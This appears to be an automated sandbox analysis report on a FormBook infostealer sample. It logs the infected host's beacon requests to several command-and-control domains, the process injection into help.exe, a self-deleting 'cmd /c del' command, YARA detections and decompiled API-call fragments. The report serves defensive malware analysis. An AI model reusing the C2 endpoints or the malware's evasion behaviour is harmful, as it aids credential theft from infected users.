cache-control: max-age=0, private, must-revalidate
connection: close
content-length: 584
content-type: text/html; charset=utf-8
date: Mon, 12 Apr 2021 08:03:50 GMT
server: nginx
set-cookie: sid=9de5d662-9b65-11eb-8f4c-2dd5d5311804; path=/; domain=.moretuantired.com; expires=Sat, 30 Apr 2089 11:17:57 GMT; max-age=2147483647; HttpOnly
Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.moretuantired.com/iu4d/?J6A=t0%2FehB6%2FLVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit%2F5rlSGcY6Hhw179fg+WUV7s8SGg%3D%3D&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIyMTgzMCwiaWF0IjoxNjE4MjE0NjMwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFncjhnZnR0ZXNmOG9rZWMwbGlna2siLCJuYmYiOjE2MTgyMTQ2MzAsInRzIjoxNjE4MjE0NjMwODEyNjk1fQ.G-vscyohey8on09NJbBh5p39wkJhd1xpA_7UMhB0Uaw&sid=9de5d662-9b65-11eb-8f4c-2dd5d5311804&uVjL=M6NHp');</script></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.7  49719        104.21.7.67     80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:03:55.992831945 CEST  kBytes transferred: 5275  Direction: OUT
Data:
GET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1
Host: www.betbonusuk.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:03:56.058897972 CEST  kBytes transferred: 5276  Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Apr 2021 08:03:56 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 12 Apr 2021 09:03:56 GMT
Location: https://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==
cf-request-id: 0966b4e1fe00002c824a157000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zksz97DotkzONKWrHGxfhMn0mjrpmB5IH3F2SIvN01qHstmEka6bp6V3jnPqP619zf4X3H%2BzftPL2h65voLtQveDO4QV0xGAnOUxmKXr2CvZh90%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63eaf0e338e42c82-LHR
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
4           192.168.2.7  49720        52.56.126.26    80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:04:01.201181889 CEST  kBytes transferred: 5277  Direction: OUT
Data:
GET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1
Host: www.weluvweb.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:04:01.253669024 CEST  kBytes transferred: 5278  Direction: IN
Data:
HTTP/1.1 401 Unauthorized
Server: nginx
Date: Mon, 12 Apr 2021 08:04:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 172
Connection: close
WWW-Authenticate: Basic realm="Restricted Content"
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval';
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Data Ascii: <html><head><title>401 Authorization Required</title></head><body><center><h1>401 Authorization Required</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
5           192.168.2.7  49721        3.13.255.157    80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:04:06.577115059 CEST  kBytes transferred: 5280  Direction: OUT
Data:
GET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1
Host: www.warungjitu.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:04:06.714777946 CEST  kBytes transferred: 5280  Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:04:06 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
6           192.168.2.7  49734        52.206.71.220   80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:04:17.254053116 CEST  kBytes transferred: 6138  Direction: OUT
Data:
GET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1
Host: www.appearwood.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:04:17.381587029 CEST  kBytes transferred: 6158  Direction: IN
Data:
HTTP/1.1 502 Bad Gateway
Server: openresty/1.15.8.3
Date: Mon, 12 Apr 2021 08:04:17 GMT
Content-Type: text/html
Content-Length: 0
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
7           192.168.2.7  49735        142.111.76.118  80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:04:22.810084105 CEST  kBytes transferred: 6174  Direction: OUT
Data:
GET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1
Host: www.theartsutra.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
8           192.168.2.7  49736        172.67.130.43   80                C:\Windows\explorer.exe

Timestamp: Apr 12, 2021 10:04:28.499571085 CEST  kBytes transferred: 6202  Direction: OUT
Data:
GET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1
Host: www.chestfreezersale.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Apr 12, 2021 10:04:28.859160900 CEST  kBytes transferred: 6203  Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:04:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d539d58d2bef24b0ad4345217a6c1ca9c1618214668; expires=Wed, 12-May-21 08:04:28 GMT; path=/; domain=.chestfreezersale.xyz; HttpOnly; SameSite=Lax
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 0966b560fa000006b2230ea000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sVWI7jUSxielKSjGjJx1VmKTHjQ2vbIlNcFeqq0CvvoL%2B%2FqGEalcFF%2FnzrvqTnYo%2Bw2aSzG8hdHANa2R9bPcDrVWOCkZIAVJINbJwHDmMt5DcCrCTeq89kY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63eaf1ae5d2a06b2-LHR
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Ascii: 29a0<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-he
                                                                  Apr 12, 2021 10:04:28.859213114 CEST6205INData Raw: 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32
                                                                  Data Ascii: ight: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0;
                                                                  Apr 12, 2021 10:04:28.859246016 CEST6206INData Raw: 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                  Data Ascii: ason-text { margin: 20px 0; font-size: 16px; } ul { display: inline-block; list-style: none outside none; margin: 0; padding: 0; } ul li {
                                                                  Apr 12, 2021 10:04:28.859287024 CEST6207INData Raw: 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: ul li { width: 100%; text-align: left; } .additional-info-items ul li:first-child { padding: 20px; } .reason-text { font-size: 18p
Apr 12, 2021 10:04:28.859467983 CEST  6213  IN  Data Ascii: s-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.chestfreezersale.xyz's <a href="/cdn-cgi/l/email-protection#83ebecf0f7eaede4aeedecf7eae5eae0e
Apr 12, 2021 10:04:28.859505892 CEST  6214  IN  Data Ascii: </div> </li> <li class="info-server"></li> </ul> </div> </div> </section> <footer> <div class="container"


Session ID: 9  Source IP: 192.168.2.7  Source Port: 49741  Destination IP: 192.0.78.25  Destination Port: 80  Process: C:\Windows\explorer.exe
Timestamp  kBytes transferred  Direction  Data
Apr 12, 2021 10:04:50.410053968 CEST  6232  OUT  GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1
                                                                  Host: www.emmajanetracy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
Apr 12, 2021 10:04:50.450371027 CEST  6233  IN  HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:04:50 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                                                  X-ac: 2.hhn _dfw
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Memory Usage

                                                                  High Level Behavior Distribution

                                                                  Behavior

                                                                  System Behavior

                                                                  General

Start time: 10:02:28
Start date: 12/04/2021
Path: C:\Users\user\Desktop\s6G3ZtvHZg.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
Imagebase: 0x460000
File size: 893952 bytes
MD5 hash: 885E567660A28EC23B692291587EF69F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                  General

Start time: 10:02:34
Start date: 12/04/2021
Path: C:\Users\user\Desktop\s6G3ZtvHZg.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\s6G3ZtvHZg.exe
Imagebase: 0x3f0000
File size: 893952 bytes
MD5 hash: 885E567660A28EC23B692291587EF69F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                  General

Start time: 10:02:35
Start date: 12/04/2021
Path: C:\Users\user\Desktop\s6G3ZtvHZg.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\s6G3ZtvHZg.exe
Imagebase: 0xbc0000
File size: 893952 bytes
MD5 hash: 885E567660A28EC23B692291587EF69F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                  General

Start time: 10:02:38
Start date: 12/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff662bf0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                  General

Start time: 10:02:52
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\help.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\help.exe
Imagebase: 0xbf0000
File size: 10240 bytes
MD5 hash: 09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                                                  General

Start time: 10:02:57
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
Imagebase: 0x370000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                  General

Start time: 10:02:57
Start date: 12/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                  Disassembly

                                                                  Code Analysis

                                                                    Executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C8DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C8DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C86D8E,?,?,?,?,?), ref: 00C86E4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C86D8E,?,?,?,?,?), ref: 00C86E4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C86D8E,?,?,?,?,?), ref: 00C86E4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8BE89,00000800,00000000,00000000), ref: 00C8C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: d6b10c9287940c3bf2286e5ec09d5d72fe76b1a9e4cdb701fe81e7b369dea7a9
                                                                    • Instruction ID: 363f899ea7fc469bb573d853575a71b92c000d8966bf7032adae41bcf6fd2eab
                                                                    • Opcode Fuzzy Hash: d6b10c9287940c3bf2286e5ec09d5d72fe76b1a9e4cdb701fe81e7b369dea7a9
                                                                    • Instruction Fuzzy Hash: 0711F2B69002099BDB10DF9AD484BDEBBF4AB48358F14842AE929B7600C375A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C8BE89,00000800,00000000,00000000), ref: 00C8C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: ccb44d3f51b205a5b11cb7f1774f77329f72b0d2e236fca1d8de0738680ce78d
                                                                    • Instruction ID: a7fa5c2c16e7175baa921f19e3affd7a998e6c2793b4e2f831e735041b3565c4
                                                                    • Opcode Fuzzy Hash: ccb44d3f51b205a5b11cb7f1774f77329f72b0d2e236fca1d8de0738680ce78d
                                                                    • Instruction Fuzzy Hash: FB1103B6D00209CFCB10DF99D4847DEFBF4AB48354F14851ED529A7600C375A949CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00C8BBDB), ref: 00C8BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: a47c724d71f0dc5097cf7e0e22840e31340ad6e7222b908cb99fa481ae924795
                                                                    • Instruction ID: 622effa8ec248b68c05457759b7eb174fa7cbab70442963eee64853347f1a9b0
                                                                    • Opcode Fuzzy Hash: a47c724d71f0dc5097cf7e0e22840e31340ad6e7222b908cb99fa481ae924795
                                                                    • Instruction Fuzzy Hash: 861120B1C002498FCB10DF9AD444BDEBBF4EB88328F10842AD929A7610C374A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00C8DEA8,?,?,?,?), ref: 00C8DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 584e5af319d70ed80dbf84b7765a6862732456f2573823743edace37ac90cafc
                                                                    • Instruction ID: 727bea8cf422441014b8bb686c3c67c1ac077f0bb96cbdf4ad1c8ba74b0f6fe9
                                                                    • Opcode Fuzzy Hash: 584e5af319d70ed80dbf84b7765a6862732456f2573823743edace37ac90cafc
                                                                    • Instruction Fuzzy Hash: 6F1115B59043099FDB10DF99D485BEEBBF8EB48324F10841AE92AB7740C374A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.250804572.0000000000462000.00000002.00020000.sdmp, Offset: 00460000, based on PE: true
                                                                    • Associated: 00000000.00000002.250794747.0000000000460000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.250913344.0000000000524000.00000002.00020000.sdmp
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12b78c96d0dd41f0e1f6d4216e41cee284de8fc453108d18cbe6ecf7714c416b
                                                                    • Instruction ID: 7202f40fce84d891eea5d4cde8672d5cc905b51b05bff743ded60c15f5898f66
                                                                    • Opcode Fuzzy Hash: 12b78c96d0dd41f0e1f6d4216e41cee284de8fc453108d18cbe6ecf7714c416b
                                                                    • Instruction Fuzzy Hash: A8D1F06251E3C12FC753873488652D17FB09F172A0B2E45EBE4C4CE0ABE5AD598AC726
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.251649718.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47b886f788688d67dde79542f434058265e15e8759f8c760fe4b79bfb794fe34
                                                                    • Instruction ID: d1037f91e7946c2ce7f7563720a0ea49059fba4b1fa731f70332e58901c0d56c
                                                                    • Opcode Fuzzy Hash: 47b886f788688d67dde79542f434058265e15e8759f8c760fe4b79bfb794fe34
                                                                    • Instruction Fuzzy Hash: B7C106B189274ABAD710CF65F9B85897B61FBC5328F50420AD9612B7E0D7BC284BCF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    C-Code - Quality: 37%
                                                                    			/* Decompiled wrapper: forwards nine arguments through a function-pointer
                                                                    			   slot at offset 0xc48 of the context block passed in _a4. The APIs entry
                                                                    			   below resolves the indirect call at 004182A5 to NtReadFile, whose native
                                                                    			   signature has exactly nine parameters. E00418DB0 is called first with the
                                                                    			   constant 0x2a; its body is not shown in this excerpt. */
                                                                    			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                    				void* _t18;
                                                                    				void* _t27;
                                                                    				intOrPtr* _t28;
                                                                    				intOrPtr _t13;   /* context block; declarations missing from the decompiler output */
                                                                    				char* _t6;
                                                                    				char* _t12;
                                                                    
                                                                    				_t13 = _a4;
                                                                    				_t28 = _a4 + 0xc48;                    /* slot holding the target function pointer */
                                                                    				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                    				_t6 =  &_a32; // 0x413d42
                                                                    				_t12 =  &_a8; // 0x413d42
                                                                    				/* indirect call through the slot: NtReadFile(FileHandle, Event, ApcRoutine,
                                                                    				   ApcContext, IoStatusBlock, Buffer, Length, ByteOffset, Key) */
                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                    				return _t18;
                                                                    			}
                                                                    
                                                                    			Instruction addresses of the listing (instruction text not preserved in this copy): 0x00418263, 0x0041826f, 0x00418277, 0x00418282, 0x0041829d, 0x004182a5 (the NtReadFile call site), 0x004182a9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: B=A$B=A
                                                                    • API String ID: 2738559852-2767357659
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
